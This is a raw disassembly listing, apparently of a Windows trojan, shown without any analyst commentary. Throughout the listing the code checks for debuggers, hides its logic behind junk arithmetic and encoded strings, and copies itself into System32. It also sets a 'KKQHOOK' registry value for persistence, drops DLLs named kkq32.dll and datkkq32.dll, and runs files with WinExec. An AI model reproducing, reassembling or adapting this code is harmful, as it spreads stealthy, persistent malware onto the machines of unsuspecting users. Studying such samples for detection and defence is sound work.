sub eax, dword_43B098
push eax
lea eax, [ebp+var_4707]
push eax
call sub_40170F
call sub_40C634 ; IsDebuggerPresent
push 9
push offset word_445DAA
call sub_40129C
lea edi, [ebp+var_4707]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_600]
push edi
call sub_40CA30
mov [ebp+var_470F], 51h
movzx eax, [ebp+var_470F]
imul eax, 7CFBh
mov [ebp+var_470F], al
lea eax, [ebp+var_600]
push eax
call sub_403449
push 1
push offset asc_445DBA ; "Ü"
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35F0]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_45EF]
push edi
push offset dword_40E010
call sub_4062CD
mov ebx, eax
lea edi, [ebp+var_4742]
lea esi, aSx ; "sx"
mov ecx, 3
rep movsb
lea eax, [ebp+var_600]
push eax
call sub_40C760 ; DeleteFileA
mov [ebp+var_4714], 7F66h
inc [ebp+var_4714]
lea eax, [ebp+var_600]
push eax
call sub_4034D8
add esp, 50h
call sub_40C634 ; IsDebuggerPresent
or ebx, ebx
jz short loc_40A0AB
call sub_40C634 ; IsDebuggerPresent
cmp [ebp+var_604], 0
jz short loc_40A0AB
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkqc ; "ofstkkqc"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4015EB
add esp, 18h
loc_40A0AB: ; CODE XREF: sub_409847+737�j
; sub_409847+832�j ...
push 0
push 80h
push 3
push 0
push 0
push 80000000h
push offset dword_413F90
call sub_40C67C ; CreateFileA
mov [ebp+var_4604], eax
mov [ebp+var_45FC], 7514h
mov eax, [ebp+var_45FC]
mov edx, eax
add edx, eax
mov [ebp+var_45FC], edx
cmp [ebp+var_4604], 0FFFFFFFFh
jz loc_40A5BF
mov eax, dword_445B6F
mov [ebp+var_4746], eax
push [ebp+var_4604]
call sub_40C55C ; CloseHandle
mov [ebp+var_4716], 0DEAh
movzx eax, [ebp+var_4716]
imul eax, 4C28h
mov [ebp+var_4716], ax
lea eax, [ebp+var_45EF]
push eax
lea eax, [ebp+var_E08]
push eax
call sub_40CA30
mov [ebp+var_4718], 7CFCh
movzx eax, [ebp+var_4718]
imul eax, 2F59h
mov [ebp+var_4718], ax
push 6
push offset aTRq ; "ÉĄŻ"
call sub_40129C
push eax
lea edi, [ebp+var_E08]
push edi
call sub_40CA54
call sub_40C574 ; GetProcessHeap
lea eax, [ebp+var_600]
push eax
call sub_403449
push 1
push offset asc_445DBA ; "Ü"
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push [ebp+var_35F0]
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_600]
push edi
lea edi, [ebp+var_E08]
push edi
push offset dword_413F90
call sub_4062CD
mov ebx, eax
mov [ebp+var_4719], 18h
movzx eax, [ebp+var_4719]
imul eax, 4B74h
mov [ebp+var_4719], al
lea eax, [ebp+var_600]
push eax
call sub_40C760 ; DeleteFileA
mov [ebp+var_471C], 0F12h
sub [ebp+var_471C], 161h
lea eax, [ebp+var_600]
push eax
call sub_4034D8
add esp, 48h
or ebx, ebx
jz short loc_40A21B
call sub_40C508 ; GetCurrentProcessId
push offset dword_413F90
call sub_40C760 ; DeleteFileA
call sub_40C598 ; GetTickCount
loc_40A21B: ; CODE XREF: sub_409847+4FD�j
; sub_409847+9BE�j
cmp [ebp+var_200], 3Ah
jnz loc_40A3F3
cmp [ebp+var_1FD], 3Ah
jnz loc_40A3F3
mov [ebp+var_35F2], 77A0h
inc [ebp+var_35F2]
call sub_40C598 ; GetTickCount
mov [ebp+var_1FD], 0
push 5
push offset aCiaq ; "Ų"
call sub_40129C
lea edi, [ebp+var_35F0]
push edi
push eax
lea edi, [ebp+var_200]
push edi
call sub_40CA48
add esp, 14h
mov [ebp+var_35F4], 28B3h
movzx eax, [ebp+var_35F4]
imul eax, 66EEh
mov [ebp+var_35F4], ax
cmp [ebp+var_35F0], 0
jz short loc_40A2C3
call sub_40CA18
mov edx, 621B97C3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
inc edi
cmp edi, [ebp+var_35F0]
ja loc_40A56A
loc_40A2C3: ; CODE XREF: sub_409847+A51�j
call sub_40C508 ; GetCurrentProcessId
cmp ds:dword_418680, 2
jnz short loc_40A325
call sub_40C538 ; RtlGetLastWin32Error
push 400h
lea eax, [ebp+var_600]
push eax
call sub_40C580 ; GetSystemDirectoryA
push 0Ah
push offset byte_44658B
call sub_40129C
lea edi, [ebp+var_600]
push edi
push eax
lea edi, [ebp+var_100F]
push edi
call sub_40CA30
push 8
push offset word_446582
call sub_40129C
push eax
lea edi, [ebp+var_600]
push edi
call sub_40CA54
add esp, 24h
jmp short loc_40A3A2
; ---------------------------------------------------------------------------
loc_40A325: ; CODE XREF: sub_409847+A88�j
mov eax, dword_445B73
mov [ebp+var_35F8], eax
push 400h
lea eax, [ebp+var_600]
push eax
call sub_40C5C8 ; GetWindowsDirectoryA
mov ax, word_445B77
mov [ebp+var_35FA], ax
push 0Eh
push offset byte_446563
call sub_40129C
lea edi, [ebp+var_600]
push edi
push eax
lea edi, [ebp+var_100F]
push edi
call sub_40CA30
lea edi, [ebp+var_35FD]
lea esi, byte_445B79
mov ecx, 3
rep movsb
push 0Ch
push offset word_446556
call sub_40129C
push eax
lea edi, [ebp+var_600]
push edi
call sub_40CA54
add esp, 24h
call sub_40C514 ; GetCurrentThreadId
loc_40A3A2: ; CODE XREF: sub_409847+ADC�j
lea eax, [ebp+var_100F]
push eax
call sub_40C760 ; DeleteFileA
call sub_40C514 ; GetCurrentThreadId
push 8
push offset aINvuni ; "ŽīŽ"
call sub_40129C
lea edi, [ebp+var_200]
add edi, 4
push edi
lea edi, [ebp+var_600]
push edi
push eax
lea edi, [ebp+var_600]
push edi
call sub_40CA30
add esp, 18h
push 0
lea eax, [ebp+var_600]
push eax
call sub_40C724 ; WinExec
call sub_40C514 ; GetCurrentThreadId
loc_40A3F3: ; CODE XREF: sub_409847+9DB�j
; sub_409847+9E8�j
push 5
push offset aN_0 ; "ŚŲŻÉ"
call sub_40129C
mov edi, 0Dh
sub edi, dword_43B098
push edi
push eax
lea edi, [ebp+var_200]
push edi
call sub_401806
add esp, 14h
or eax, eax
jnz loc_40A56A
call sub_40C5A4 ; GetVersion
lea edi, [ebp+var_55F7]
lea esi, byte_445B7C
mov ecx, 3
rep movsb
mov eax, dword_43B094
add eax, 5
push eax
lea eax, [ebp+var_F0B]
push eax
call sub_40170F
mov [ebp+var_55F1], 33h
add [ebp+var_55F1], 1
push 9
push offset word_445DFA
call sub_40129C
lea edi, [ebp+var_F0B]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_45EB]
push edi
call sub_40CA30
lea eax, [ebp+var_1FB]
push eax
lea eax, [ebp+var_55EA]
push eax
call sub_40C4B8
mov [ebp+var_55F0], 4C44h
mov eax, [ebp+var_55F0]
mov edx, eax
add edx, eax
mov [ebp+var_55F0], edx
push 3
push offset aQ ; "ÕÉ"
call sub_40129C
mov [ebp+var_55FC], eax
push 1
push offset asc_445DBA ; "Ü"
call sub_40129C
push 0
push 0
push 0
push eax
mov edi, [ebp+var_55FC]
push edi
lea edi, [ebp+var_45EB]
push edi
lea edi, [ebp+var_55EA]
push edi
push 0
call sub_4062CD
add esp, 50h
mov ebx, eax
mov [ebp+var_55F4], 2AB6h
sub [ebp+var_55F4], 2B3Ah
cmp ebx, 2
jnz short loc_40A56A
mov [ebp+var_55FD], 0D1h
add [ebp+var_55FD], 1
push 0
lea eax, [ebp+var_45EB]
push eax
call sub_40C724 ; WinExec
push 6
push offset asc_445D8C ; "ĆČŚŪČß"
call sub_40129C
mov edi, 3
sub edi, dword_43B094
push edi
push eax
lea edi, [ebp+var_55EA]
push edi
call sub_401806
add esp, 14h
cmp eax, 0FFFFh
jz short loc_40A56A
mov eax, 0Dh
sub eax, dword_43B098
push eax
call sub_40C9DC
pop ecx
loc_40A56A: ; CODE XREF: sub_409847+399�j
; sub_409847+3AA�j ...
lea eax, [ebp+var_200]
push eax
push [ebp+var_608]
push [ebp+var_E0C]
call sub_401B9A
add esp, 0Ch
mov [ebp+var_608], eax
or eax, eax
jnz loc_409BE5
push [ebp+var_E0C]
call sub_40C658 ; LocalFree
mov [ebp+var_102C], 5DFBh
mov eax, 658Bh
mul [ebp+var_102C]
mov [ebp+var_15D8], eax
mov [ebp+var_102C], eax
loc_40A5BF: ; CODE XREF: sub_409847+2FE�j
; sub_409847+36E�j ...
call sub_408BE4
call sub_40C598 ; GetTickCount
fld dbl_445D84
fimul dword_43B0B4
mov edi, eax
call sub_40C410
xchg eax, edi
push edi
call sub_40C9D0
mov edi, dword_43B0B8
sub edi, eax
inc edi
mov [ebp+var_1014], edi
mov [ebp+var_101C], 19AEh
movzx eax, [ebp+var_101C]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_101C], ax
mov eax, edi
mov [ebp+var_15DC], eax
push eax
call sub_40C9D0
add esp, 8
mov edi, [ebp+var_15DC]
add edi, eax
mov [ebp+var_1014], edi
mov [ebp+var_102D], 45h
sub [ebp+var_102D], 1Ch
mov eax, edi
mov edi, dword_43B0B8
sub edi, dword_43B0B4
mov ecx, edi
inc ecx
xor edx, edx
div ecx
mov [ebp+var_15E0], eax
mov [ebp+var_1014], eax
mov [ebp+var_101D], 0DFh
movzx eax, [ebp+var_101D]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_101D], al
call sub_40CA18
mov [ebp+var_15E4], eax
mov eax, dword_43B0B4
mov edx, 66666667h
push ecx
mov ecx, eax
imul edx
sar edx, 1
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
lea edi, [eax+eax*4]
mov esi, [ebp+var_1014]
mov edx, [ebp+var_15E4]
mov eax, esi
imul eax, [ebp+var_15E4]
mov ecx, 0Ah
cdq
idiv ecx
lea edi, [edi+edx+5]
mov dword_43B0B4, edi
lea edi, [ebp+var_117A]
lea esi, byte_445B7F
mov ecx, 3
rep movsw
mov eax, dword_43B0B8
cmp dword_43B0B4, eax
jbe short loc_40A6ED
and dword_43B0B4, 0
loc_40A6ED: ; CODE XREF: sub_409847+E9D�j
push 30D40h
call sub_40C9B8
pop ecx
jmp loc_4098DE
sub_409847 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A704 proc near ; CODE XREF: sub_40A766+11�p
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
mov ax, word_445B85
mov [ebp+var_A], ax
mov [ebp+var_1], 47h
sub [ebp+var_1], 66h
push offset aKkqhook_28 ; "KKQHOOK_28"
push 0
push 1F0001h
call sub_40C664 ; OpenMutexA
mov [ebp+var_8], eax
or eax, eax
jz short loc_40A763
call sub_40C598 ; GetTickCount
push [ebp+var_8]
call sub_40C55C ; CloseHandle
call sub_40C514 ; GetCurrentThreadId
mov eax, 3
sub eax, dword_43B094
push eax
call sub_40C9DC
pop ecx
mov ax, word_445B87
mov [ebp+var_C], ax
loc_40A763: ; CODE XREF: sub_40A704+2F�j
pop edi
leave
retn
sub_40A704 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A766 proc near ; CODE XREF: sub_40C434+5C�p
var_7F1 = byte ptr -7F1h
var_7EB = byte ptr -7EBh
var_7E9 = byte ptr -7E9h
var_7E8 = dword ptr -7E8h
var_7E2 = word ptr -7E2h
var_7DD = byte ptr -7DDh
var_7DC = dword ptr -7DCh
var_7D7 = byte ptr -7D7h
var_7D0 = byte ptr -7D0h
var_7CC = byte ptr -7CCh
var_7C7 = byte ptr -7C7h
var_7C2 = byte ptr -7C2h
var_7BA = byte ptr -7BAh
var_7B4 = byte ptr -7B4h
var_7B3 = byte ptr -7B3h
var_7AB = dword ptr -7ABh
var_7A7 = dword ptr -7A7h
var_7A3 = byte ptr -7A3h
var_79C = byte ptr -79Ch
var_794 = byte ptr -794h
var_78D = byte ptr -78Dh
var_788 = dword ptr -788h
var_784 = byte ptr -784h
var_783 = byte ptr -783h
var_77E = byte ptr -77Eh
var_67F = byte ptr -67Fh
var_580 = byte ptr -580h
var_47C = dword ptr -47Ch
var_478 = dword ptr -478h
var_474 = byte ptr -474h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_366 = word ptr -366h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_35C = byte ptr -35Ch
var_2F8 = byte ptr -2F8h
var_294 = dword ptr -294h
var_28D = byte ptr -28Dh
var_28C = word ptr -28Ch
var_289 = byte ptr -289h
var_288 = dword ptr -288h
var_281 = byte ptr -281h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_272 = word ptr -272h
var_270 = word ptr -270h
var_26E = byte ptr -26Eh
var_16A = word ptr -16Ah
var_168 = dword ptr -168h
var_163 = byte ptr -163h
var_162 = byte ptr -162h
var_5E = word ptr -5Eh
var_5C = dword ptr -5Ch
var_55 = dword ptr -55h
var_51 = dword ptr -51h
var_4D = dword ptr -4Dh
var_49 = dword ptr -49h
var_45 = dword ptr -45h
var_41 = dword ptr -41h
var_3D = dword ptr -3Dh
var_39 = dword ptr -39h
var_35 = dword ptr -35h
var_31 = dword ptr -31h
var_2D = byte ptr -2Dh
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_1D = byte ptr -1Dh
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 7F4h
push ebx
push esi
push edi
call sub_40C634 ; IsDebuggerPresent
call sub_40A704
call sub_40C538 ; RtlGetLastWin32Error
lea edi, [ebp+var_783]
lea esi, aQk ; "qk "
mov ecx, 5
rep movsb
push 104h
lea eax, [ebp+var_162]
push eax
call sub_40C580 ; GetSystemDirectoryA
mov [ebp+var_163], 2Ch
movzx eax, [ebp+var_163]
imul eax, 45FBh
mov [ebp+var_163], al
push 13h
push offset dword_445D70
call sub_40129C
push eax
lea edi, [ebp+var_162]
push edi
call sub_40CA54
add esp, 10h
call sub_40C538 ; RtlGetLastWin32Error
push 0
push 0
push 3
push 0
push 0
push 80000001h
lea eax, [ebp+var_162]
push eax
call sub_40C67C ; CreateFileA
mov [ebp+var_370], eax
cmp eax, 0FFFFFFFFh
jnz short loc_40A80D
call sub_4085D0
jmp short loc_40A818
; ---------------------------------------------------------------------------
loc_40A80D: ; CODE XREF: sub_40A766+9E�j
push [ebp+var_370]
call sub_40C55C ; CloseHandle
loc_40A818: ; CODE XREF: sub_40A766+A5�j
lea edi, [ebp+var_784]
lea esi, byte_445B8E
xor ecx, ecx
inc ecx
rep movsb
push 9
push offset asc_445D66 ; "ČĆĢĻĮČÉŽĖ"
call sub_40129C
push eax
call sub_40C5D4 ; GlobalAddAtomA
call sub_40C5A4 ; GetVersion
mov eax, [ebp+arg_0]
mov ds:dword_41DA84, eax
mov ds:dword_418670, 94h
push offset dword_418670
call sub_40C5B0 ; GetVersionExA
mov eax, dword_445B8F
mov [ebp+var_788], eax
push 0FFh
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
call sub_40C580 ; GetSystemDirectoryA
mov [ebp+var_168], 5BB4h
mov eax, 7833h
mul [ebp+var_168]
mov [ebp+var_7DC], eax
mov [ebp+var_168], eax
call sub_40C598 ; GetTickCount
push eax
call sub_40CA3C
mov [ebp+var_16A], 5032h
add [ebp+var_16A], 7611h
lea edi, [ebp+var_78D]
lea esi, a3hay ; "3hAy"
mov ecx, 5
rep movsb
push 104h
lea eax, [ebp+var_474]
push eax
push [ebp+arg_0]
call sub_40C544 ; GetModuleFileNameA
call sub_40C514 ; GetCurrentThreadId
and [ebp+var_5C], 0
mov [ebp+var_478], 4
mov ebx, 4C9Bh
mov eax, ebx
add eax, ebx
mov ebx, eax
lea eax, [ebp+var_794]
push eax
lea eax, [ebp+var_478]
push eax
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4014BD
add esp, 24h
mov [ebp+var_47C], eax
or eax, eax
jz short loc_40A95C
mov [ebp+var_7DD], 57h
add [ebp+var_7DD], 1
cmp [ebp+var_5C], 1Ch
jbe short loc_40A952
mov eax, 0Dh
sub eax, dword_43B098
push eax
call sub_40C9DC
pop ecx
loc_40A952: ; CODE XREF: sub_40A766+1D8�j
cmp [ebp+var_5C], 1Ch
jz loc_40AAD6
loc_40A95C: ; CODE XREF: sub_40A766+1C4�j
lea edi, [ebp+var_79C]
lea esi, a8bTfa ; "<8B=tf"
movsd
movsd
lea edi, [ebp+var_7A3]
lea esi, a_rVnx ; "_r&nx"
mov ecx, 7
rep movsb
call sub_40CA18
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_2D], dl
mov [ebp+var_1], 1
jmp short loc_40A9D4
; ---------------------------------------------------------------------------
loc_40A9A7: ; CODE XREF: sub_40A766+273�j
call sub_40CA18
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_2D], dl
add [ebp+var_1], 1
loc_40A9D4: ; CODE XREF: sub_40A766+23F�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_40A9A7
mov [ebp+var_25], 0
call sub_40CA18
mov edx, eax
test dl, 1
jnz short loc_40AA0D
mov [ebp+var_7DD], 0A4h
movzx eax, [ebp+var_7DD]
imul eax, 6B38h
mov [ebp+var_7DD], al
mov [ebp+var_27], 33h
mov [ebp+var_26], 32h
loc_40AA0D: ; CODE XREF: sub_40A766+283�j
push 9
push offset dword_445D5C
call sub_40129C
lea edi, [ebp+var_2D]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_26E]
push edi
call sub_40CA30
push 0
lea eax, [ebp+var_26E]
push eax
lea eax, [ebp+var_474]
push eax
call sub_40C604 ; CopyFileA
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_2D]
push eax
call sub_403C5F
mov [ebp+var_270], 193Ah
sub [ebp+var_270], 3E0Ch
mov [ebp+var_5C], 1Ch
push 4
push 4
lea eax, [ebp+var_5C]
push eax
push offset aKkqhook ; "KKQHOOK"
push offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_4015EB
add esp, 34h
push 0
lea eax, [ebp+var_26E]
push eax
call sub_40C724 ; WinExec
mov eax, dword_445BA7
mov [ebp+var_7A7], eax
call sub_404194
mov [ebp+var_272], 0CB0h
sub [ebp+var_272], 5CCh
mov eax, 3
sub eax, dword_43B094
push eax
call sub_40C4E4 ; ExitProcess
mov eax, dword_445BAB
mov [ebp+var_7AB], eax
loc_40AAD6: ; CODE XREF: sub_40A766+1F0�j
push 5
push offset word_445D56
call sub_40129C
push offset aKkq32_dll ; "kkq32.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
push offset dword_41EA80
call sub_40CA30
mov [ebp+var_278], 57BFh
sub [ebp+var_278], 674Fh
push 5
push offset word_445D56
call sub_40129C
push offset aDnkkq_dll ; "dnkkq.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
push offset dword_40F280
call sub_40CA30
mov [ebp+var_27C], 1B3Dh
sub [ebp+var_27C], 108Ah
push 5
push offset word_445D56
call sub_40129C
push offset aDatkkq32_dll ; "datkkq32.dll"
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
push offset dword_40E010
call sub_40CA30
mov [ebp+var_280], 4FE3h
add [ebp+var_280], 4ADFh
push 0FFh
push offset dword_413F90
call sub_40C5C8 ; GetWindowsDirectoryA
call sub_40C598 ; GetTickCount
push 9
push offset byte_445D2B
call sub_40129C
push eax
push offset dword_413F90
call sub_40CA54
call sub_40C598 ; GetTickCount
lea eax, aKkqhook ; "KKQHOOK"
mov [ebp+var_31], eax
mov [ebp+var_281], 0E4h
movzx eax, [ebp+var_281]
imul eax, 3FBBh
mov [ebp+var_281], al
mov eax, ds:dword_41DA84
mov [ebp+var_45], eax
lea eax, sub_40B143
mov [ebp+var_51], eax
push 7F00h
push 0
call sub_40C7C0 ; LoadCursorA
mov [ebp+var_3D], eax
mov [ebp+var_288], 5083h
mov eax, 4FDBh
mul [ebp+var_288]
mov [ebp-7E0h], eax
mov [ebp+var_288], eax
push 7F03h
push 0
call sub_40C7CC ; LoadIconA
mov [ebp+var_41], eax
call sub_40C538 ; RtlGetLastWin32Error
and [ebp+var_35], 0
push 0
call sub_40C8C8 ; GetStockObject
mov [ebp+var_39], eax
mov [ebp+var_55], 3
and [ebp+var_4D], 0
and [ebp+var_49], 0
lea eax, [ebp+var_55]
push eax
call sub_40C7E4 ; RegisterClassA
call sub_40C508 ; GetCurrentProcessId
push 0
push ds:dword_41DA84
push 0
push 0
push 0
push 0
push 0
push 0
push 0CA0000h
push offset aKkqhook ; "KKQHOOK"
push offset aKkqhook ; "KKQHOOK"
push 0
call sub_40C88C ; CreateWindowExA
mov ds:dword_41B89C, eax
mov [ebp+var_289], 1Dh
add [ebp+var_289], 1
push offset aKkqhook_28 ; "KKQHOOK_28"
push 0
push 0
call sub_40C6C4 ; CreateMutexA
call sub_40C634 ; IsDebuggerPresent
push 2
call sub_402A4D
add esp, 5Ch
call sub_40C634 ; IsDebuggerPresent
call sub_40C5A4 ; GetVersion
cmp eax, 80000000h
jb loc_40AD43
lea edi, [ebp+var_7EB]
lea esi, byte_445BAF
mov ecx, 3
rep movsb
push 0Ch
push offset aUqg ; "ĘČßĆČĮÉĮĮ"
call sub_40129C
push eax
call sub_40C550 ; GetModuleHandleA
mov edi, eax
push 16h
push offset byte_445D07
call sub_40129C
add esp, 10h
push eax
push edi
call sub_40C568 ; GetProcAddress
mov [ebp+var_7E8], eax
lea edi, [ebp+var_7F1]
lea esi, aVcxs ; "|vCXS"
mov ecx, 3
rep movsw
call sub_40C508 ; GetCurrentProcessId
mov edi, 3
sub edi, dword_43B094
push edi
push eax
call [ebp+var_7E8]
mov [ebp+var_7E2], 1273h
movzx eax, [ebp+var_7E2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_7E2], ax
loc_40AD43: ; CODE XREF: sub_40A766+54B�j
lea edi, [ebp+var_7B3]
lea esi, aWBqy ; " w bqy "
movsd
movsd
push 104h
lea eax, [ebp+var_580]
push eax
push 0
call sub_40C544 ; GetModuleFileNameA
lea eax, [ebp+var_580]
push eax
call sub_403449
lea edi, [ebp+var_7B4]
lea esi, byte_445BC0
xor ecx, ecx
inc ecx
rep movsb
push offset dword_41EA80
call sub_403449
mov [ebp+var_28C], 3040h
inc [ebp+var_28C]
push offset dword_40F280
call sub_403449
mov [ebp+var_28D], 0C8h
sub [ebp+var_28D], 2Ch
push offset dword_40E010
call sub_403449
mov [ebp+var_294], 73D3h
add [ebp+var_294], 7F76h
call sub_40C508 ; GetCurrentProcessId
push eax
call sub_4036F2
lea edi, [ebp+var_7BA]
lea esi, aWAs@ ; "W!aS@"
mov ecx, 3
rep movsw
lea edi, [ebp+var_7C2]
lea esi, aLKVm ; "l:K VM~"
mov ecx, 2
rep movsd
lea eax, [ebp+var_2F8]
push eax
call sub_4039D6
and [ebp+var_360], 0
mov [ebp+var_364], 64h
call sub_40C508 ; GetCurrentProcessId
push 45h
push offset byte_445CC1
call sub_40129C
lea edi, [ebp+var_360]
push edi
lea edi, [ebp+var_364]
push edi
lea edi, [ebp+var_35C]
push edi
lea edi, [ebp+var_2F8]
push edi
push eax
push 80000002h
call sub_4014BD
lea edi, [ebp+var_7C7]
lea esi, aScG ; "Sc g"
mov ecx, 5
rep movsb
push 1
push offset byte_445CBF
call sub_40129C
push eax
lea edi, [ebp+var_35C]
push edi
call sub_4037EF
mov [ebp+var_366], 0ABBh
movzx eax, [ebp+var_366]
imul eax, 144Dh
mov [ebp+var_366], ax
push 1
push offset byte_445CBD
call sub_40129C
push eax
lea edi, [ebp+var_2F8]
push edi
call sub_4037EF
lea edi, [ebp+var_7CC]
lea esi, a3sd_ ; "3Sd_"
mov ecx, 5
rep movsb
push 17h
push offset byte_445CA5
call sub_40129C
lea edi, [ebp+var_35C]
push edi
push eax
lea edi, [ebp+var_77E]
push edi
call sub_40CA30
mov [ebp+var_5E], 3CC6h
movzx eax, [ebp+var_5E]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5E], ax
lea eax, [ebp+var_360]
push eax
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_67F]
push eax
push 0
lea eax, [ebp+var_77E]
push eax
push 80000000h
call sub_4014BD
mov [ebp+var_36C], 4978h
sub [ebp+var_36C], 4EB6h
lea eax, [ebp+var_67F]
push eax
call sub_403449
call sub_40C538 ; RtlGetLastWin32Error
call sub_403AA3
push offset sub_408189
call sub_40801C
add esp, 8Ch
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_7D0]
push eax
push 0
push 0
push offset sub_409847
push 0
push 0
call sub_40C754 ; CreateThread
push eax
call sub_40C55C ; CloseHandle
lea edi, [ebp+var_7D7]
lea esi, aKT ; "^+k!~T"
mov ecx, 7
rep movsb
push 0
mov eax, dword_43B098
mov edx, eax
add edx, 1E8h
push edx
mov edx, 0Dh
sub edx, eax
push edx
push ds:dword_41B89C
call sub_40C7D8 ; SetTimer
jmp short loc_40B001
; ---------------------------------------------------------------------------
loc_40AFBF: ; CODE XREF: sub_40A766+8AC�j
mov [ebp+var_7E2], 3F2Eh
add [ebp+var_7E2], 0CABh
lea eax, [ebp+var_1D]
push eax
call sub_40C844 ; TranslateMessage
mov [ebp+var_7E8], 5962h
inc [ebp+var_7E8]
lea eax, [ebp+var_1D]
push eax
call sub_40C850 ; DispatchMessageA
mov [ebp+var_7E9], 0B5h
sub [ebp+var_7E9], 2
loc_40B001: ; CODE XREF: sub_40A766+857�j
push 0
push 0
push 0
lea eax, [ebp+var_1D]
push eax
call sub_40C7FC ; GetMessageA
or eax, eax
jnz short loc_40AFBF
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40A766 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B01B proc near ; DATA XREF: sub_408E89+8BD�o
; sub_408E89+8FE�o ...
var_1C = dword ptr -1Ch
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_6 = dword ptr -6
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+arg_4]
cmp eax, 100h
jz short loc_40B049
jmp loc_40B0C2
; ---------------------------------------------------------------------------
mov [ebp+var_10], 2420h
add [ebp+var_10], 3723h
loc_40B049: ; CODE XREF: sub_40B01B+19�j
call sub_40C538 ; RtlGetLastWin32Error
cmp [ebp+arg_8], 9
jnz short loc_40B0C2
cmp edi, ds:dword_410848
jnz short loc_40B067
push ds:dword_431D04
call sub_40C7A8 ; SetFocus
loc_40B067: ; CODE XREF: sub_40B01B+3F�j
mov [ebp+var_14], 134h
mov eax, 33B6h
mul [ebp+var_14]
mov [ebp+var_1C], eax
mov [ebp+var_14], eax
cmp edi, ds:dword_431D04
jnz short loc_40B08F
push ds:dword_41DA7C
call sub_40C7A8 ; SetFocus
loc_40B08F: ; CODE XREF: sub_40B01B+67�j
call sub_40C538 ; RtlGetLastWin32Error
cmp edi, ds:dword_41DA7C
jnz short loc_40B0A7
push ds:dword_41DA74
call sub_40C7A8 ; SetFocus
loc_40B0A7: ; CODE XREF: sub_40B01B+7F�j
mov [ebp+var_15], 71h
add [ebp+var_15], 3Ah
cmp edi, ds:dword_41DA74
jnz short loc_40B0C2
push ds:dword_431D04
call sub_40C7A8 ; SetFocus
loc_40B0C2: ; CODE XREF: sub_40B01B+1B�j
; sub_40B01B+37�j ...
xor esi, esi
cmp edi, ds:dword_431D04
jnz short loc_40B0D2
mov esi, ds:dword_41EA7C
loc_40B0D2: ; CODE XREF: sub_40B01B+AF�j
mov ebx, 74B5h
inc ebx
cmp edi, ds:dword_41DA7C
jnz short loc_40B0E6
mov esi, ds:dword_41DA78
loc_40B0E6: ; CODE XREF: sub_40B01B+C3�j
mov [ebp+var_2], 354Dh
add [ebp+var_2], 3C6Bh
cmp edi, ds:dword_410848
jnz short loc_40B100
mov esi, ds:dword_40E008
loc_40B100: ; CODE XREF: sub_40B01B+DD�j
mov ebx, 6788h
add ebx, 110Ch
cmp edi, ds:dword_41DA74
jnz short loc_40B119
mov esi, ds:dword_413F6C
loc_40B119: ; CODE XREF: sub_40B01B+F6�j
call sub_40C574 ; GetProcessHeap
or esi, esi
jz short loc_40B134
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push edi
push esi
call sub_40C8BC ; CallWindowProcA
jmp short loc_40B13C
; ---------------------------------------------------------------------------
loc_40B134: ; CODE XREF: sub_40B01B+105�j
mov eax, dword_445BE0
